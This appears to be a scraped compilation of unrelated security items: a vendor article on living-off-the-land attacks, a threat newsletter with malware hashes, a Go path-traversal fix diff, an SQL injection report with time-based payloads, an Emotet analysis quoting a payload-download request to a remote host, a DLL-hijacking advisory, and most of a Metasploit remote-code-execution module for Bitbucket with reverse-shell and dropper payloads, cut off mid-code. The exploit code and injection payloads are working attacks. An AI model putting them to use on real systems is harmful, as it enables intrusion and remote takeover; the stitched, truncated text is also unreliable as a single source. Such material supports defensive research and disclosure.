Attackers are increasingly staying under the radar by using your own tools against you. Only behavioral AI can catch these stealthy attacks.

The most advanced cyberattackers try to look like your administrators, abusing legitimate credentials, using legitimate system binaries or tools that are natively utilized in the victim's environment. These "living-off-the-land' (LotL) cyberattacks continue to cause headaches for security teams, which often have no effective means of differentiating between malicious behavior and legitimate administrative behavior.

When an attacker uses applications and services native to your environment, your own staff also use these systems, and a signature- or rules-based detection system will either miss the activity or end up alerting or disrupting your own employees' actions.

It is no surprise then that these attacks have been found to be highly effective, with the Ponemon Institute finding that fileless malware attacks are about 10 times more likely to succeed than file-based attacks.

LotL cyberattackers rely on a variety of tools and techniques, including:

*   **Using PowerShell** to launch malicious scripts, escalate privileges, install backdoors, create new tasks on remote machines, identify configuration settings, evade defences, exfiltrate data, access Active Directory information, and more
*   Using **Windows Command Processor (CMD.exe)**, to run batch scripts, and **(WScript.exe) and Console Based Script Host (CScript.exe)** to execute Visual Basic scripts, offering them more automation.
*   **.NET applications** for resource installation via the .NET Framework. Installutil.exe allows attackers to execute untrusted code via the trusted program
*   Using the **Registry Console Tool (reg.exe)** to maintain persistence, store settings for malware, and store executables in subkeys.
*   And many others, including **WMI (Windows Management Instrumentation), Service Control Manager Configuration Tool (sc.exe), Scheduled Tasks (AT.EXE Process)**, and Sysinternals such as **PSExec**.

LotL techniques involving Remote Desktop Protocol (RDP) connections can be some of the most difficult activities to triage for security teams, as RDP often represents a critical service for system administrators. For security teams, it can be exceptionally difficult to parse through and identify which RDP connections are legitimate and which are not, especially when administrative credentials are involved.

Defensive systems focused on "known bads" and historical attack data fail to catch the malicious use of some of the tools described above. Stopping these attacks requires a business-centric defensive strategy that uses AI to understand "normal" behavior of every user and device in your organization to detect anomalous activity in real time.

Take, for example, this real-world attack that targeted a Darktrace customer in July 2022.

    

Figure 1: A timeline of the attack. Source: Darktrace

The first sign of a compromise was observed when Darktrace's AI revealed an internal workstation and domain controller (DC) engaging in unusual scanning activity, before the DC made an outbound connection to a suspicious endpoint that was highly rare for the environment. The contents of this connection revealed that the threat actor was exporting passwords from a successful cracking attempt via Mimikatz — a presence that previously had been unknown to the security team.

Several devices then began initiating outbound connections to AnyDesk-related websites, a possible means of persistence or a backdoor for the attacker. In their first demonstration of LotL methods, the attacker initiated a "golden ticket attack" culminating in new admin logins. With their new position of privilege, use of the automating "ITaskSchedulerService" and Hydra brute-force tool the next day allowed for even deeper insights and enumeration of the customer's environment.

One device even remotely induced a living-off-the-land binary (LOLBin) attack. By creating and running a new service on three different destinations, the attacker retrieved MiniDump memory contents and feed any information of interest back through Mimikatz. Not only can this strategy be used to identify further passwords, but it allows for lateral movement via code executions and new file operations such as downloading or moving.

On the final day, a new DC was seen engaging in an uncommonly high volume of outbound calls to the DCE-RPC operations "samr" and "srvsvc" (both of which are legitimate WMI services). Later, the DC responsible for the initial compromise began engaging in outbound SSH connections to a rare endpoint and uploading significant volumes of data over multiple connections.

    

Figure 2: Darktrace's Device Event Log reveals some of the LotL techniques used by the attacker

The attacker's use of legitimate and widely used tools throughout this attack meant the attack flew under the radar of the rest of the security teams' stack, but Darktrace's AI stitched together multiple anomalies indicative of an attack and revealed the full scope of the incident to the security team, with every stage of the attack outlined.

This technology can go further than just threat detection. Its understanding of what's "normal" for the business allows it to initiate a targeted response, containing only the malicious activity. In this case, this autonomous response functionality was not configured, but the customer turned it on soon after. Even so, the security team was able to use the information gathered by Darktrace to contain the attack and prevent any further data exfiltration or mission success.

LotL attacks are proving successful for attackers and are unlikely to go away as a result. For this reason, security teams are increasingly moving away from "legacy" defenses and toward AI that understands "'normal" for everyone and everything in the business to shine a light on the subtle anomalies that comprise a cyberattack — even if that attack relies primarily on legitimate tools.

**About the Author**

    

Tony Jarvis is Director of Enterprise Security, Asia-Pacific and Japan, at Darktrace. Tony is a seasoned cybersecurity strategist who has advised Fortune 500 companies around the world on best practice for managing cyber-risk. He has counseled governments, major banks, and multinational companies, and his comments on cybersecurity and the rising threat to critical national infrastructure have been reported in local and international media including CNBC, Channel News Asia, and The Straits Times. Tony holds a BA in Information Systems from the University of Melbourne.

Leveraging Behavioral Analysis to Catch Living-Off-the-Land Attacks

The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine.

Thursday, March 16, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

We’re written a ton about Cisco Talos’ support of Ukraine and our friends and allies there. Now, we encourage you to watch and listen to the folks who have been working hands-on there.

The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine to help defend critical infrastructure, intelligence partners and government agencies in Ukraine. You can watch the full documentary above, or over on YouTube here.

**The one big thing**

We have new research out on a never-before-seen threat actor called YoroTrooper that’s carrying out a variety of espionage activity in Europe and Asia. This group has targeted several high-profile government organizations, including one in the European Union, stealing sensitive information such as login credentials, browser histories and cookies, system information and screenshots.

**Why do I care?**

While YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, we believe this is a new cluster of activity from an entirely new threat actor. YoroTrooper is clearly going after major targets and has already been successful, so everyone should be on the lookout for these attacks, but especially users and organizations in Commonwealth of Independent States (CIS) countries.

**So now what?**

YoroTrooper creates malicious domains and spoofs commonly visited URLs that look like they belong to government agencies in the targeted countries to host its malware. So any time you go to open an email attachment or click on a link in an email, triple check to make sure it’s really where you want to go, or that you can verify the sender. Additionally, the blog outlines a range of protections in Cisco Secure products that can defend and detect this group’s actions.

**Top security headlines of the week**

The APLHV ransomware cartel claims to have **successfully stolen data belonging to Amazon’s Ring smart home company.** The ransomware gang’s dark website threatened to leak the data earlier this week, though it showed no evidence of a successful attack. Ring said on Tuesday that it had “no indications that Ring has experienced a ransomware event.” ALPHV, which is known for the BlackCat malware, usually encrypts targets’ data and threatens to leak the stolen information if the victim does not pay the requested ransom payment. Politico also reported this week that Ring will openly share recorded footage with local law enforcement, even if the camera’s user declines to do so, sparking questions about who owns security footage on private property and whether users are compelled to share those recordings. (Vice, TechCrunch, Politico)

Sensitive information from D.C. Health Link — the online health insurance marketplace for Washington, D.C. — is **reportedly for sale on the dark web,** potentially affecting White House staff and members of Congress. An internal memo last week warned of a "significant data breach” that potentially exposed the personal information of thousands of federal employees and warned potential victims that their data may have been compromised. As many as 21 members from the U.S. House and Senate could be affected, all of whom get their insurance through the program. In all, 56,415 customers were affected, according to the exchange. (CBS News, Roll Call)

Microsoft **released its monthly security update Tuesday,** disclosing 83 vulnerabilities across the company’s hardware and software line, including two issues that are actively being exploited in the wild, continuing a trend of zero-days appearing in Patch Tuesdays over the past few months. Two of the vulnerabilities included in March’s security update have been exploited in the wild, according to Microsoft, including one critical issue. One of the zero-days included this month, CVE-2023-23397, is a privilege escalation vulnerability in Microsoft Outlook that could force a targeted device to connect to a remote URL and transmit the Windows account's Net-NTLMv2 hash to an adversary. To trigger this vulnerability, a user doesn’t even need to open the email or preview it, the vulnerability is triggered as soon as the email is retrieved by the targeted email server. (Cisco Talos, SecurityWeek)

**Can’t get enough Talos?**

*   Talos Takes Ep. #130: There’s not actually more spam during tax season, just different spam
*   Researcher Spotlight: How David Liebenberg went from never having opened Terminal to hunting international APTs
*   YoroTrooper cyberspies target CIS energy orgs, EU embassies
*   YoroTrooper Espionage Campaigns Target CIS, EU Countries
*   Updated Prometei botnet evades defenses, mines Monero

**Upcoming events where you can find Talos**

**WiCyS (March 16 - 18)**

Denver, CO

**RSA (April 24 - 27)**

San Francisco, CA

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

Threat Source newsletter (March 16, 2023) — A deep dive into Talos' work in Ukraine

Proof of concept code for a critical Microsoft Outlook vulnerability for Windows that allows hackers to remotely steal hashed passwords by simply receiving an email.

Microsoft Outlook CVE-2023-23397 Proof Of Concept

go-used-util has commonly used utility functions for Go. Versions prior to 0.0.34 have a ZipSlip issue when using fsutil package to unzip files. When users use `zip.Unzip` to unzip zip files from a malicious attacker, they may be vulnerable to path traversal. The issue has been fixed in version 0.0.34. There are no known workarounds.

@@ -55,7 +55,7 @@ func ReadLinesV2(path string) (\[\]string, int, error) { } }  
// ListDir lists all the file or dir names in the specified directory. // ListDir lists all the file or directory names in the specified directory. // Note that ListDir don't traverse recursively. func ListDir(dirname string) (\[\]string, error) { infos, err := ioutil.ReadDir(dirname) @@ -69,12 +69,12 @@ func ListDir(dirname string) (\[\]string, error) { return names, nil }  
// IsPathExist checks whether a file/dir exists. // IsExist checks whether a file/dir exists. // Use os.Stat to get the info of the target file or dir to check whether exists. // If os.Stat returns nil err, the target exists. // If os.Stat returns a os.ErrNotExist err, the target does not exist. // If the error returned is another type, the target is uncertain whether exists. func IsPathExist(path string) (bool, error) { func IsExist(path string) (bool, error) { \_, err := os.Stat(path) if err \== nil { return true, nil @@ -123,17 +123,19 @@ func IsFileE(path string) (bool, error) { return false, err }  
// IsSymlink checks a file whether is a symbolic link. // IsSymlink checks a file whether is a symbolic link on Linux. // Note that this doesn't work for the shortcut file on windows. // If you want to check a file whether is a shortcut file on Windows please use IsShortcut function. func IsSymlink(path string) bool { if info, err := os.Lstat(path); err \== nil && info.Mode()&os.ModeSymlink != 0 { return true } return false }  
// IsSymlinkE checks a file whether is a symbolic link. // IsSymlinkE checks a file whether is a symbolic link on Linux. // Note that this doesn't work for the shortcut file on windows. // If you want to check a file whether is a shortcut file on Windows please use IsShortcut function. func IsSymlinkE(path string) (bool, error) { info, err := os.Lstat(path) if err \== nil && info.Mode()&os.ModeSymlink != 0 { @@ -142,27 +144,37 @@ func IsSymlinkE(path string) (bool, error) { return false, err }  
// IsShortcut checks a file whether is a shortcut on Windows. func IsShortcut(path string) bool { ext := filepath.Ext(path) if ext \== ".lnk" { return true } return false }  
// RemoveFile removes the named file or empty directory. // https://gist.github.com/novalagung/13c5c8f4d30e0c4bff27 // If there is an error, it will be of type \*PathError. func RemoveFile(path string) error { err := os.Remove(path) return err return os.Remove(path) }  
// Create creates or truncates the target file specified by path. // If the parent directory does not exist, it will be created with mode os.ModePerm.is cr truncated. // If the parent directory does not exist, it will be created with mode os.ModePerm. // If the file does not exist, it is created with mode 0666. // If successful, methods on the returned File can be used for I/O; the associated file descriptor has mode O\_RDWR. func Create(filePath string) (\*os.File, error) { if exist, err := IsPathExist(filePath); err != nil { // If successful, methods on the returned file can be used for I/O; the associated file descriptor has mode O\_RDWR. func Create(path string) (\*os.File, error) { exist, err := IsExist(path) if err != nil { return nil, err } else if exist { return os.Create(filePath) } if err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil { if exist { return os.Create(path) } if err := os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil { return nil, err } return os.Create(filePath) return os.Create(path) }  
// CreateFile creates a file specified by path. @@ -181,15 +193,16 @@ func FileToBytes(path string) \[\]byte { return byteStream }  
// BytesToFile writes data to a file. If the file does not exist it will be created with permission mode 0644. func BytesToFile(filePath string, data \[\]byte) error { exist, \_ := IsPathExist(filePath) // BytesToFile writes data to a file. // If the file does not exist it will be created with permission mode 0644. func BytesToFile(path string, data \[\]byte) error { exist, \_ := IsExist(path) if !exist { if err := CreateFile(filePath); err != nil { if err := CreateFile(path); err != nil { return err } } return ioutil.WriteFile(filePath, data, 0644) return ioutil.WriteFile(path, data, 0644) }  
// GetDirAllEntryPaths gets all the file or dir paths in the specified directory recursively. @@ -260,3 +273,13 @@ func GetDirAllEntryPathsFollowSymlink(dirname string, incl bool) (\[\]string, erro } return paths, nil }  
// ClearFile clears a file content. func ClearFile(path string) error { f, err := os.OpenFile(path, os.O\_WRONLY|os.O\_TRUNC, 0777) if err != nil { return err } defer f.Close() return nil }

CVE-2023-28105: fix zip.Unzip path traversal vulnerability and add some new file util… · dablelv/go-huge-util@0e308b0

School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.

Permalink

Cannot retrieve contributors at this time

**School Registration and Fee System v1.0 has SQL injection**

BUG\_Author:Forsan

Vulnerability File: /bilal final/edit\_user.php

GET parameter 'id' exists SQL injection vulnerability

Payload1: http://localhost/bilal%20final/edit\_user.php?id=3%27

    GET /bilal%20final/edit_user.php?id=3%27 HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

An error occurred in the sql statement

Payload2: http://localhost/bilal%20final/edit\_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b

    GET /bilal%20final/edit_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

The server's response time is 5 seconds

CVE-2023-27041: bug_report/SQLi-1.md at main · forsean/bug_report

Categories: Threat Intelligence
Emotet finally got the memo and added Microsoft OneNote lures.



(Read more...)




The post Emotet adopts Microsoft OneNote attachments appeared first on Malwarebytes Labs.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet's turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\\OneNote\\16.0\\NT\\0\\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn\[.\]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: \*/\*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\\OneNote\\16.0\\NT\\0\\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Emotet adopts Microsoft OneNote attachments

An issue found in UwAmp v.1.1, 1.2, 1.3, 2.0, 2.1, 2.2, 2.2.1, 3.0.0, 3.0.1, 3.0.2 allows a remote attacker to execute arbitrary code via a crafted DLL.

Platform: Windows 10 version 1904

Impact: Arbitrary Code Execution and Privilege Escalation

Product: UwAmp.exe

Version: 3.0.2

Summary:

A malicous user can perform arbitrary code execution and priviledge escalation on victim machine by hijacking DLLs.

DLL Hijacking vulnerability occurs when some DLLs are missing from same directory of vulnerable binary.

Crafted Malicous DLLs are used to replace missing dlls and perform malicious actions

Missing DLL : shfolder.dll

Steps to reproduce:

1\. Use ProcMon to listen on events

2\. ProcMon shows shfolder.dll is missing from current directory

2\. Place malicious DLL naming shfolder.dll to current directory of installer

3\. Now run UwAmp.exe and installer will try to load malicous dll which leads to arbitrary code execution and privilege escalation.

Impact:

1\. Privilege Escalation

2\. Arbitrary Code Execution

Mitigation:

1\. Avoid loading DLLs from current location

CVE-2021-31637: UwAmp Arbitrary Code Execution

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the atlbitbucket user by injecting the GIT_EXTERNAL_DIFF environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the GIT_EXTERNAL_DIFF environment variable will be run once the Bitbucket application is coerced into generating a diff. This Metasploit module requires at least admin credentials, as admins and above only have the option to change their user name.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Git  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Bitbucket Environment Variable RCE',        'Description' => %q{          For various versions of Bitbucket, there is an authenticated command injection          vulnerability that can be exploited by injecting environment          variables into a user name. This module achieves remote code execution          as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment          variable, a null character as a delimiter, and arbitrary code into a user's          user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable          will be run once the Bitbucket application is coerced into generating a diff.          This module requires at least admin credentials, as admins and above          only have the option to change their user name.        },        'License' => MSF_LICENSE,        'Author' => [          'Ry0taK', # Vulnerability Discovery          'y4er', # PoC and blog post          'Shelby Pace' # Metasploit Module        ],        'References' => [          [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],          [ 'CVE', '2022-43781']        ],        'Platform' => [ 'win', 'unix', 'linux' ],        'Privileged' => true,        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Linux Command',            {              'Platform' => 'unix',              'Type' => :unix_cmd,              'Arch' => [ ARCH_CMD ],              'Payload' => { 'Space' => 254 },              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'MaxLineChars' => 254,              'Type' => :linux_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => %i[wget curl],              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'MaxLineChars' => 254,              'Type' => :win_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => [ :psh_invokewebrequest ],              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-11-16',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Opt::RPORT(7990),        OptString.new('USERNAME', [ true, 'User name to log in with' ]),        OptString.new('PASSWORD', [ true, 'Password to log in with' ]),        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    return CheckCode::Unknown('Failed to retrieve a response from the target') unless res    return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')    nokogiri_data = res.get_html_document    footer = nokogiri_data&.at('footer')    return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer    version_info = footer.at('span')&.children&.text    return CheckCode::Detected('Failed to find version information in footer section') unless version_info    vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/)    return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1    version_str = vers_matches[1]    vprint_status("Found version #{version_str} of Bitbucket")    major, minor, revision = version_str.split('.')    rev_num = revision.to_i    case major    when '7'      case minor      when '0', '1', '2', '3', '4', '5'        return CheckCode::Appears      when '6'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 18      when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16'        return CheckCode::Appears      when '17'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 11      when '18', '19', '20'        return CheckCode::Appears      when '21'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 5      end    when '8'      print_status('Versions 8.* are vulnerable only if the mesh setting is disabled')      case minor      when '0'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '1'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '2'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 3      when '3'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 2      when '4'        return CheckCode::Appears if rev_num == 0 || rev_num == 1      end    end    CheckCode::Detected  end  def default_branch    @default_branch ||= Rex::Text.rand_text_alpha(5..9)  end  def uname_payload(cmd)    "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})"  end  def log_in(username, password)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),      'keep_cookies' => true,      'vars_post' => {        'j_username' => username,        'j_password' => password,        '_atl_remember_me' => 'on',        'submit' => 'Log in'      }    )    fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res    unless res.body.include?('Logged in')      fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')    end  end  def create_project    proj_uri = normalize_uri(target_uri.path, 'projects?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => proj_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project')    vprint_status('Retrieving security token')    html_doc = res.get_html_document    token_data = html_doc.at('div//input[@name="atl_token"]')    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data    @token = token_data['value']    fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?    project_name = Rex::Text.rand_text_alpha(5..9)    project_key = Rex::Text.rand_text_alpha(5..9).upcase    res = send_request_cgi(      'method' => 'POST',      'uri' => proj_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => project_name,        'key' => project_key,        'submit' => 'Create project',        'atl_token' => @token      }    )    fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res    fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)    print_status('Project creation was successful')    [ project_name, project_key ]  end  def create_repository    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => repo_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res    html_doc = res.get_html_document    dropdown_data = html_doc.at('li[@class="user-dropdown"]')    fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?    email = dropdown_data&.at('span')&.[]('data-emailaddress')    fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?    repo_name = Rex::Text.rand_text_alpha(5..9)    res = send_request_cgi(      'method' => 'POST',      'uri' => repo_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => repo_name,        'defaultBranchId' => default_branch,        'description' => '',        'scmId' => 'git',        'forkable' => 'false',        'atl_token' => @token,        'submit' => 'Create repository'      }    )    fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse')    )    fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404    print_good("Successfully created repository '#{repo_name}'")    [ email, repo_name ]  end  def generate_repo_objects(email, repo_file_data = [], parent_object = nil)    txt_data = Rex::Text.rand_text_alpha(5..20)    blob_object = GitObject.build_blob_object(txt_data)    file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"    file_data = {      mode: '100755',      file_name: file_name,      sha1: blob_object.sha1    }    tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ])    tree_obj = GitObject.build_tree_object(tree_data)    commit_obj = GitObject.build_commit_object({      tree_sha1: tree_obj.sha1,      email: email,      message: Rex::Text.rand_text_alpha(4..30),      parent_sha1: (parent_object.nil? ? nil : parent_object.sha1)    })    {      objects: [ commit_obj, tree_obj, blob_object ],      file_data: file_data    }  end  # create two files in two separate commits in order  # to view a diff and get code execution  def create_commits(email)    init_objects = generate_repo_objects(email)    commit_obj = init_objects[:objects].first    refs = {      'HEAD' => "refs/heads/#{default_branch}",      "refs/heads/#{default_branch}" => commit_obj.sha1    }    final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj)    repo_objects = final_objects[:objects] + init_objects[:objects]    new_commit = final_objects[:objects].first    new_file = final_objects[:file_data][:file_name]    git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")    res = send_receive_pack_request(      git_uri,      refs['HEAD'],      repo_objects,      '0' * 40 # no commits should exist yet, so no branch tip in repo yet    )    fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res    fail_with(Failure::UnexpectedReply, 'Git responded with an error') if res.body.include?('error:')    fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')    [ new_commit.sha1, commit_obj.sha1, new_file ]  end  def get_user_id(curr_uname)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'admin/users/view'),      'vars_get' => { 'name' => curr_uname }    )    matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/)    fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1    matched_id[1]  end  def change_username(curr_uname, new_uname)    @user_id ||= get_user_id(curr_uname)    headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-AUSERID' => @user_id,      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}"    }    vars = {      'name' => curr_uname,      'newName' => new_uname    }.to_json    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'),      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => headers,      'data' => vars    )    unless res      print_bad('Did not receive a response to the user name change request')      return false    end    unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')      print_bad('User name change was unsuccessful')      return false    end    true  end  def commit_uri(project_key, repo_name, commit_sha)    normalize_uri(      target_uri.path,      'rest/api/latest/projects',      project_key,      'repos',      repo_name,      'commits',      commit_sha    )  end  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)    commit_diff_uri = normalize_uri(      commit_uri(@project_key, @repo_name, latest_commit_sha),      'diff',      diff_file    )    send_request_cgi(      'method' => 